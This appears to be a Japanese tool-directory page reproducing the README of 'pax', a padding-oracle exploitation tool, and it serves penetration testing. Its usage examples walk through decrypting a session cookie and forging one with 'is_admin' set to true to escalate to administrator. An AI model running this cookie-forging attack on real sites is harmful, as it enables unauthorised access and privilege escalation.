Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pax — :skull: :unlock: PKCS7パディングオラクル攻撃用CLIツール | Kitploit
ツール/GitHubGitHub/liamg/pax
エクスプロイトウェブアプリケーション悪用暗号化ペネトレーションテスト
GitHubliamg/pax

pax

💀 🔓 PKCS7パディングオラクル攻撃用CLIツール

リポジトリを見る
142175年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

pax

Travis Build Status GoReportCard

パディングオラクルを悪用して、楽しみながら利益を得よう!

Pax(Padding oracle eXploiter)は、パディングオラクルを悪用するためのツールです。以下の目的で使用します。

  1. 与えられたCBC暗号化データの平文を取得します。
  2. 与えられた平文に対して、オラクルが使用する未知の暗号化アルゴリズムを用いて暗号化されたバイトを取得します。

これにより、暗号化されたセッション情報を開示したり、認証を回避したり、権限を昇格させたり、カスタム平文を暗号化してサーバーに書き戻すことでリモートコード実行を行うことができます。

いつものことですが、このツールは自分が所有している、または探査の許可を得ているシステムでのみ使用してください。

インストール

releases からダウンロードするか、Go でインストールしてください。

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

使用例

暗号化データが SESS という名前のクッキーに保存されている疑いのあるオラクルを見つけた場合、以下のように使用できます。

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

これにより、おそらく次のような平文が得られるでしょう。

root@kitploit:~
 {"user_id": 456, "is_admin": false}

ここで権限を昇格できそうですね!

そのためには、まずオラクルが復号してこっそりとした平文に戻す、自分自身の暗号化データを生成してみてください。

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

これにより、別のbase64エンコードされた暗号化データが出力されます。おそらく次のようになります。

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

ブラウザを開き、SESS クッキーの値を上記の値に設定します。元のオラクルページを読み込むと、管理者レベルに昇格していることが確認できるはずです。

これはどのように動作するのか?

以下は、この攻撃の仕組みに関する優れたガイドです。

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
ツールをダウンロード